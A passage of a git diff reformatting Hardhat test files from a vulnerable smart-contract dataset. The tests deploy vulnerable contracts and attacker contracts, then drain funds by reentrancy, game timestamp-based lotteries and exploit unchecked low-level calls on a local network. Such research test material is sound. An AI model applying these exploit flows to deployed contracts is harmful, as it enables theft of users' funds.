'../../artifacts/contracts/dataset/reentrancy/reentrancy_simple.sol/Reentrance.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - Reentrance = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await Reentrance.deploy(); - await victim.waitForDeployment(); + // Deploy EtherStore contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/reentrancy_simple.sol/Reentrance.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + Reentrance = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await Reentrance.deploy(); + await victim.waitForDeployment(); - // Deploy MaliciousContract with Reentrance address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/reentrancy_simple_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy MaliciousContract with Reentrance address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/reentrancy_simple_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it('sanity check: reentrancy/reentrancy_simple.sol', async function () { - await expect(victim.addToBalance({value:ethers.parseEther('1')})).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther('1')); - await expect(victim.withdrawBalance()).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(0); - }); + it("sanity check: reentrancy/reentrancy_simple.sol", async function () { + await expect(victim.addToBalance({ value: ethers.parseEther("1") })).to.not + .be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("1"), + ); + await expect(victim.withdrawBalance()).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal(0); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.addToBalance( {value: ethers.parseEther("5") }); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.addToBalance({ value: ethers.parseEther("5") }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + // Initial deposit from hacker on victim contract + await hacker.deposit({ value: ethers.parseEther("1") }); - // Initial deposit from hacker on victim contract - await hacker.deposit({value: ethers.parseEther("1")}); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("6")); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("6")); + // Set hacker balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); - // Set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); + // Perform reentrancy attack through MaliciousContract + await hacker.attack(); + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + hackerBalance = await ethers.provider.getBalance(hacker.target); - // Perform reentrancy attack through MaliciousContract - await hacker.attack(); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - hackerBalance = await ethers.provider.getBalance(hacker.target); + // Verify the attack was successful - // Verify the attack was successful - - // victim has a drained account - expect(victimBalance).to.be.below(ethers.parseEther("5")); + // victim has a drained account + expect(victimBalance).to.be.below(ethers.parseEther("5")); - // 5 original balance + 2 from initial deposit - expect(hackerBalance).to.be.above(ethers.parseEther("1")); - - - }); - }); - \ No newline at end of file + // 5 original balance + 2 from initial deposit + expect(hackerBalance).to.be.above(ethers.parseEther("1")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/simple_dao_test.js b/smartbugs-curated/0.4.x/test/reentrancy/simple_dao_test.js index 7607559..8bb9020 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/simple_dao_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/simple_dao_test.js @@ -1,69 +1,87 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); describe("Reentrancy Attack for simpleDAO.sol", function () { - - async function deployContracts() { + async function deployContracts() { // Deploy SimpleDAO contract - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/simple_dao.sol/SimpleDAO.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/simple_dao.sol/SimpleDAO.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); - const SimpleDAOFactory = await ethers.getContractFactory(json.abi, json.bytecode); + const SimpleDAOFactory = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); const simpleDAO = await SimpleDAOFactory.deploy(); await simpleDAO.waitForDeployment(); // Deploy MaliciousContract with SimpleDAO address - const MaliciousContractFactory = await ethers.getContractFactory('contracts/reentrancy/simple_dao_attack.sol:MaliciousContract'); - const maliciousContract = await MaliciousContractFactory.deploy(simpleDAO.target); + const MaliciousContractFactory = await ethers.getContractFactory( + "contracts/reentrancy/simple_dao_attack.sol:MaliciousContract", + ); + const maliciousContract = await MaliciousContractFactory.deploy( + simpleDAO.target, + ); await maliciousContract.waitForDeployment(); - + //const [_, innocentAddress, attackerAddress] = [simpleDAO.target, maliciousContract.target]; - return {simpleDAO, maliciousContract} - } + return { simpleDAO, maliciousContract }; + } - it('sanity check: reentrancy/simpleDAO.sol', async function () { - const [sig] = await ethers.getSigners(); - const {simpleDAO} = await loadFixture(deployContracts); - await expect(simpleDAO.connect(sig).donate(sig.address, {value:ethers.parseEther('1')})).to.not.be.reverted; - expect(await ethers.provider.getBalance(simpleDAO.target)).to.equal(ethers.parseEther('1')); - await expect(simpleDAO.connect(sig).withdraw(ethers.parseEther('1'))).to.not.be.reverted; - expect(await ethers.provider.getBalance(simpleDAO.target)).to.equal(0); - }); + it("sanity check: reentrancy/simpleDAO.sol", async function () { + const [sig] = await ethers.getSigners(); + const { simpleDAO } = await loadFixture(deployContracts); + await expect( + simpleDAO + .connect(sig) + .donate(sig.address, { value: ethers.parseEther("1") }), + ).to.not.be.reverted; + expect(await ethers.provider.getBalance(simpleDAO.target)).to.equal( + ethers.parseEther("1"), + ); + await expect(simpleDAO.connect(sig).withdraw(ethers.parseEther("1"))).to.not + .be.reverted; + expect(await ethers.provider.getBalance(simpleDAO.target)).to.equal(0); + }); it("should successfully drain funds through reentrancy attack", async function () { - const {simpleDAO, maliciousContract} = await loadFixture(deployContracts); - const [_, innocentAddress, attackerAddress] = [,simpleDAO.target, maliciousContract.target]; - + const { simpleDAO, maliciousContract } = await loadFixture(deployContracts); + const [_, innocentAddress, attackerAddress] = [ + , + simpleDAO.target, + maliciousContract.target, + ]; // We add 10 ether into victim contract - await simpleDAO.donate( innocentAddress, { - value: ethers.parseEther("10"), - }); - + await simpleDAO.donate(innocentAddress, { + value: ethers.parseEther("10"), + }); + // Check that at this point the Victimontract's balance is 10 ETH let balanceETH = await ethers.provider.getBalance(simpleDAO.target); expect(balanceETH).to.equal(ethers.parseEther("10")); // Initial deposit from hacker on victim contract - await maliciousContract.deposit({value: ethers.parseEther("1")}); + await maliciousContract.deposit({ value: ethers.parseEther("1") }); balanceETH = await ethers.provider.getBalance(simpleDAO.target); expect(balanceETH).to.equal(ethers.parseEther("11")); - // Attacker calls the `attack` function on MaliciousContract // and sends 1 ETH await maliciousContract.attack(ethers.parseEther("1")); // Check balances after attack - const maliciousContractBalance = await ethers.provider.getBalance(attackerAddress); + const maliciousContractBalance = + await ethers.provider.getBalance(attackerAddress); const simpleDAOBalance = await ethers.provider.getBalance(innocentAddress); // Verify the attack was successful - expect(maliciousContractBalance).to.be.above(ethers.parseEther("1")); + expect(maliciousContractBalance).to.be.above(ethers.parseEther("1")); expect(simpleDAOBalance).to.be.below(ethers.parseEther("10")); - }); }); diff --git a/smartbugs-curated/0.4.x/test/time_manipulation/ether_lotto_test.js b/smartbugs-curated/0.4.x/test/time_manipulation/ether_lotto_test.js index 1d497ec..19e6e70 100644 --- a/smartbugs-curated/0.4.x/test/time_manipulation/ether_lotto_test.js +++ b/smartbugs-curated/0.4.x/test/time_manipulation/ether_lotto_test.js @@ -1,57 +1,63 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack time_manipulation/ether_lotto.sol', function () { - let owner, sig1; - async function deployContracts() { - [owner, sig1] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/time_manipulation/ether_lotto.sol/EtherLotto.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const EtherLotto = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await EtherLotto.connect(owner).deploy(); - - const EtherLottoAttacker = await ethers.getContractFactory('contracts/time_manipulation/ether_lotto_attack.sol:EtherLottoAttacker'); - const attacker = await EtherLottoAttacker.deploy(victim.target); - await attacker.waitForDeployment(); - - return {victim, attacker}; +describe("attack time_manipulation/ether_lotto.sol", function () { + let owner, sig1; + async function deployContracts() { + [owner, sig1] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/time_manipulation/ether_lotto.sol/EtherLotto.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const EtherLotto = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await EtherLotto.connect(owner).deploy(); + + const EtherLottoAttacker = await ethers.getContractFactory( + "contracts/time_manipulation/ether_lotto_attack.sol:EtherLottoAttacker", + ); + const attacker = await EtherLottoAttacker.deploy(victim.target); + await attacker.waitForDeployment(); + + return { victim, attacker }; + } + + it("sanity check: time_manipulation/ether_lotto.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.play({ value: 10 })).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.be.gte(0); + }); + + it("exploit time manipulation vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + + const victimBalanceBefore = await ethers.provider.getBalance(victim.target); + expect(victimBalanceBefore).to.equal(0); + + const attackerBalanceBefore = await ethers.provider.getBalance( + attacker.target, + ); + expect(attackerBalanceBefore).to.equal(0); + + const sigBalance = await ethers.provider.getBalance(sig1.address); + const tx = await victim.connect(sig1).play({ value: 10 }); + const receipt = await tx.wait(); + const sigBalanceAfter = await ethers.provider.getBalance(sig1.address); + const net = + sigBalanceAfter - sigBalance + receipt.gasUsed * receipt.gasPrice; + + let attackerBalance = attackerBalanceBefore; + + while (attackerBalance == 0) { + await attacker.play({ value: 10 }); + attackerBalance = await ethers.provider.getBalance(attacker.target); } - - it('sanity check: time_manipulation/ether_lotto.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.play({value:10})).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.be.gte(0); - }); - - it('exploit time manipulation vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - - const victimBalanceBefore = await ethers.provider.getBalance(victim.target); - expect(victimBalanceBefore).to.equal(0); - - const attackerBalanceBefore = await ethers.provider.getBalance(attacker.target); - expect(attackerBalanceBefore).to.equal(0); - - const sigBalance = await ethers.provider.getBalance(sig1.address); - const tx = await victim.connect(sig1).play({value: 10}); - const receipt = await tx.wait(); - const sigBalanceAfter = await ethers.provider.getBalance(sig1.address); - const net = sigBalanceAfter - sigBalance + receipt.gasUsed * receipt.gasPrice; - - let attackerBalance = attackerBalanceBefore; - - while (attackerBalance == 0) { - await attacker.play({value: 10}); - attackerBalance = await ethers.provider.getBalance(attacker.target); - } - if (net == -10n) { - expect(attackerBalance).to.equal(19); - } - else { - expect(attackerBalance).to.equal(9); - } - - }); - }); \ No newline at end of file + if (net == -10n) { + expect(attackerBalance).to.equal(19); + } else { + expect(attackerBalance).to.equal(9); + } + }); +}); diff --git a/smartbugs-curated/0.4.x/test/time_manipulation/roulette_test.js b/smartbugs-curated/0.4.x/test/time_manipulation/roulette_test.js index b2b9d9f..58e7831 100644 --- a/smartbugs-curated/0.4.x/test/time_manipulation/roulette_test.js +++ b/smartbugs-curated/0.4.x/test/time_manipulation/roulette_test.js @@ -1,55 +1,63 @@ -const { loadFixture, time } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { + loadFixture, + time, +} = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack time_manipulation/roulette.sol', function () { - let owner, sig1, amount; - async function deployContracts() { - [owner, sig1] = await ethers.getSigners(); - - amount = ethers.parseEther("10"); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/time_manipulation/roulette.sol/Roulette.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const Roulette = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await Roulette.connect(owner).deploy({value: amount}); - - return {victim}; - } - - it('sanity check: time_manipulation/roulette.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect( owner.sendTransaction({ - to: victim.target, - value: amount - })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.be.gt(0); +describe("attack time_manipulation/roulette.sol", function () { + let owner, sig1, amount; + async function deployContracts() { + [owner, sig1] = await ethers.getSigners(); + + amount = ethers.parseEther("10"); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/time_manipulation/roulette.sol/Roulette.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const Roulette = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await Roulette.connect(owner).deploy({ value: amount }); + + return { victim }; + } + + it("sanity check: time_manipulation/roulette.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect( + owner.sendTransaction({ + to: victim.target, + value: amount, + }), + ).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.be.gt(0); + }); + + it("exploit time manipulation vulnerability", async function () { + const { victim } = await loadFixture(deployContracts); + const victimBalanceBefore = await ethers.provider.getBalance(victim.target); + expect(victimBalanceBefore).to.equal(amount); + + const sig1BalanceBefore = await ethers.provider.getBalance(sig1.address); + + const blockBefore = await ethers.provider.getBlock(); + const timestampBefore = blockBefore.timestamp; + + const next = timestampBefore + 15 - (timestampBefore % 15); + + await time.setNextBlockTimestamp(next); + + const tx = await sig1.sendTransaction({ + to: victim.target, + value: amount, }); - - it('exploit time manipulation vulnerability', async function () { - const {victim} = await loadFixture(deployContracts); - const victimBalanceBefore = await ethers.provider.getBalance(victim.target); - expect(victimBalanceBefore).to.equal(amount); + const receipt = await tx.wait(); - const sig1BalanceBefore = await ethers.provider.getBalance(sig1.address); - - const blockBefore = await ethers.provider.getBlock(); - const timestampBefore = blockBefore.timestamp; - - - const next = timestampBefore + 15 -(timestampBefore % 15); - - await time.setNextBlockTimestamp(next); - - const tx = await sig1.sendTransaction({ - to: victim.target, - value: amount - }); - - const receipt = await tx.wait(); - - const sig1Balance = await ethers.provider.getBalance(sig1.address); - expect(sig1Balance).to.equal(sig1BalanceBefore - receipt.gasUsed * receipt.gasPrice + amount); - }); - }); \ No newline at end of file + const sig1Balance = await ethers.provider.getBalance(sig1.address); + expect(sig1Balance).to.equal( + sig1BalanceBefore - receipt.gasUsed * receipt.gasPrice + amount, + ); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/time_manipulation/timed_crowdsale_test.js b/smartbugs-curated/0.4.x/test/time_manipulation/timed_crowdsale_test.js index 056b1ee..16e76ee 100644 --- a/smartbugs-curated/0.4.x/test/time_manipulation/timed_crowdsale_test.js +++ b/smartbugs-curated/0.4.x/test/time_manipulation/timed_crowdsale_test.js @@ -1,37 +1,47 @@ -const { loadFixture, time, mine } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { + loadFixture, + time, + mine, +} = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack time_manipulation/timed_crowdsale.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/time_manipulation/timed_crowdsale.sol/TimedCrowdsale.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const TimedCrowdsale = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await TimedCrowdsale.deploy(); +describe("attack time_manipulation/timed_crowdsale.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/time_manipulation/timed_crowdsale.sol/TimedCrowdsale.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const TimedCrowdsale = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await TimedCrowdsale.deploy(); - return {victim}; - } + return { victim }; + } - it('sanity check: time_manipulation/timed_crowdsale.sol', async function () { - await hre.network.provider.send("hardhat_reset"); - const {victim} = await deployContracts(); - const saleFinished = await victim.isSaleFinished(); - expect(saleFinished).to.be.false; - }); - - it('exploit time manipulation vulnerability', async function () { - await hre.network.provider.send("hardhat_reset"); - const {victim} = await loadFixture(deployContracts); + it("sanity check: time_manipulation/timed_crowdsale.sol", async function () { + await hre.network.provider.send("hardhat_reset"); + const { victim } = await deployContracts(); + const saleFinished = await victim.isSaleFinished(); + expect(saleFinished).to.be.false; + }); - const saleEndTimestamp = 1546300800; + it("exploit time manipulation vulnerability", async function () { + await hre.network.provider.send("hardhat_reset"); + const { victim } = await loadFixture(deployContracts); - // Fast forward time to January 1, 2019 (just after sale end) - await time.setNextBlockTimestamp(saleEndTimestamp); - await mine(1); + const saleEndTimestamp = 1546300800; - // The sale should now be finished due to the time manipulation - const saleFinished = await victim.isSaleFinished(); - expect(saleFinished).to.be.true; - }); - }); \ No newline at end of file + // Fast forward time to January 1, 2019 (just after sale end) + await time.setNextBlockTimestamp(saleEndTimestamp); + await mine(1); + + // The sale should now be finished due to the time manipulation + const saleFinished = await victim.isSaleFinished(); + expect(saleFinished).to.be.true; + }); +}); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e_test.js index a9c4f8e..a813000 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e_test.js @@ -1,84 +1,113 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e.sol", function () { - let owner, amount; async function deployContracts() { amount = ethers.parseEther("0.01"); [owner] = await ethers.getSigners(); - const RevertContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract"); + const RevertContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract", + ); const revertContract = await RevertContract.deploy(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e.sol/PoCGame.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e.sol/PoCGame.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const PoCGame = await ethers.getContractFactory(json.abi, json.bytecode); - const contract = await PoCGame.connect(owner).deploy(revertContract.target, amount); + const contract = await PoCGame.connect(owner).deploy( + revertContract.target, + amount, + ); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const successContract = await SuccessContract.deploy(); - const successPoC = await PoCGame.connect(owner).deploy(successContract.target, amount); + const successPoC = await PoCGame.connect(owner).deploy( + successContract.target, + amount, + ); - return {contract, revertContract, successPoC, successContract} - }; + return { contract, revertContract, successPoC, successContract }; + } - it('sanity check: unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e.sol', async function () { - const {successPoC, successContract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e.sol", async function () { + const { successPoC, successContract } = await loadFixture(deployContracts); const donatedValue = await ethers.provider.getStorage(successPoC.target, 8); expect(Number(donatedValue)).to.be.equal(0); await expect(successPoC.connect(owner).AdjustDifficulty(amount)) - .to.emit(successPoC, "DifficultyChanged") - .withArgs(amount); + .to.emit(successPoC, "DifficultyChanged") + .withArgs(amount); await successPoC.connect(owner).OpenToThePublic(); - await expect(successPoC.connect(owner).wager({value: amount})) - .to.emit(successPoC, "Wager") - .withArgs(amount, owner.address); - - expect(await ethers.provider.getBalance(successPoC.target)).to.be.equal(amount); + await expect(successPoC.connect(owner).wager({ value: amount })) + .to.emit(successPoC, "Wager") + .withArgs(amount, owner.address); + + expect(await ethers.provider.getBalance(successPoC.target)).to.be.equal( + amount, + ); await expect(successPoC.connect(owner).play()) - .to.emit(successPoC, "Lose") - .withArgs(amount/BigInt(2), owner.address); - - expect(await ethers.provider.getBalance(successPoC.target)).to.be.equal(amount/BigInt(2)); - expect(await ethers.provider.getBalance(successContract.target)).to.be.equal(amount/BigInt(2)); - const donatedValueAfter = await ethers.provider.getStorage(successPoC.target, 8); - expect(Number(donatedValueAfter)).to.be.equal(amount/BigInt(2)); + .to.emit(successPoC, "Lose") + .withArgs(amount / BigInt(2), owner.address); + + expect(await ethers.provider.getBalance(successPoC.target)).to.be.equal( + amount / BigInt(2), + ); + expect( + await ethers.provider.getBalance(successContract.target), + ).to.be.equal(amount / BigInt(2)); + const donatedValueAfter = await ethers.provider.getStorage( + successPoC.target, + 8, + ); + expect(Number(donatedValueAfter)).to.be.equal(amount / BigInt(2)); }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); await expect( owner.sendTransaction({ to: revertContract.target, value: amount, - }) + }), ).to.be.revertedWith("I always revert!"); const donatedValue = await ethers.provider.getStorage(contract.target, 8); expect(Number(donatedValue)).to.be.equal(0); await expect(contract.connect(owner).AdjustDifficulty(amount)) - .to.emit(contract, "DifficultyChanged") - .withArgs(amount); + .to.emit(contract, "DifficultyChanged") + .withArgs(amount); await contract.connect(owner).OpenToThePublic(); - await expect(contract.connect(owner).wager({value: amount})) - .to.emit(contract, "Wager") - .withArgs(amount, owner.address); - - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(amount); + await expect(contract.connect(owner).wager({ value: amount })) + .to.emit(contract, "Wager") + .withArgs(amount, owner.address); + + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + amount, + ); await expect(contract.connect(owner).play()) - .to.emit(contract, "Lose") - .withArgs(amount/BigInt(2), owner.address); - - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(amount); - expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal(0); - const donatedValueAfter = await ethers.provider.getStorage(contract.target, 8); - expect(Number(donatedValueAfter)).to.be.equal(amount/BigInt(2)); + .to.emit(contract, "Lose") + .withArgs(amount / BigInt(2), owner.address); + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + amount, + ); + expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal( + 0, + ); + const donatedValueAfter = await ethers.provider.getStorage( + contract.target, + 8, + ); + expect(Number(donatedValueAfter)).to.be.equal(amount / BigInt(2)); }); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2_test.js index de8dbb1..84df00b 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2_test.js @@ -1,35 +1,53 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2.sol", function () { - let owner, sig; + let owner, sig; async function deployContracts() { [owner, sig] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2.sol/demo.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2.sol/demo.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const demo = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await demo.connect(owner).deploy(); - const TokenEBU = await ethers.getContractFactory("contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU"); + const TokenEBU = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU", + ); const token = await TokenEBU.connect(owner).deploy(1, "EBU", "EBU"); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const success_contract = await SuccessContract.connect(owner).deploy(); - return {contract, token, success_contract} - }; + return { contract, token, success_contract }; + } - it('sanity check: unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2.sol', async function () { - const {contract, success_contract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2.sol", async function () { + const { contract, success_contract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); - await expect(contract.connect(owner).transfer(owner.address, success_contract.target, [contract.target], [amount])).to.not.be.reverted; - expect(await success_contract.balanceOf(contract.target)).to.be.equal(amount); + await expect( + contract + .connect(owner) + .transfer( + owner.address, + success_contract.target, + [contract.target], + [amount], + ), + ).to.not.be.reverted; + expect(await success_contract.balanceOf(contract.target)).to.be.equal( + amount, + ); }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, token} = await loadFixture(deployContracts); + const { contract, token } = await loadFixture(deployContracts); const amount = await token.balanceOf(owner.address); expect(amount).to.be.equal(1000000000000000000n); @@ -48,11 +66,11 @@ describe("attack unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e56 const val = [10, 10]; // it does not revert cause the return value of call is not checked - await expect(contract.transfer(from, token.target, to, val)).not.be.reverted; + await expect(contract.transfer(from, token.target, to, val)).not.be + .reverted; // the second transfer does not happen expect(await token.balanceOf(owner)).to.be.equal(amount - BigInt(10)); expect(await token.balanceOf(contract.target)).to.be.equal(10); expect(await token.balanceOf(sig.address)).to.be.equal(0); - }); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa_test.js index 8353ed9..db37aa5 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa_test.js @@ -1,5 +1,5 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); @@ -7,47 +7,66 @@ describe("attack unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c561 let owner, sig; async function deployContracts() { [owner, sig] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa.sol/TokenBank.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa.sol/TokenBank.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const TokenBank = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await TokenBank.connect(owner).deploy(); - const RevertContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract"); + const RevertContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract", + ); const revertContract = await RevertContract.deploy(); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const successContract = await SuccessContract.connect(owner).deploy(); - return {contract, revertContract, successContract} - }; + return { contract, revertContract, successContract }; + } - it('sanity check: 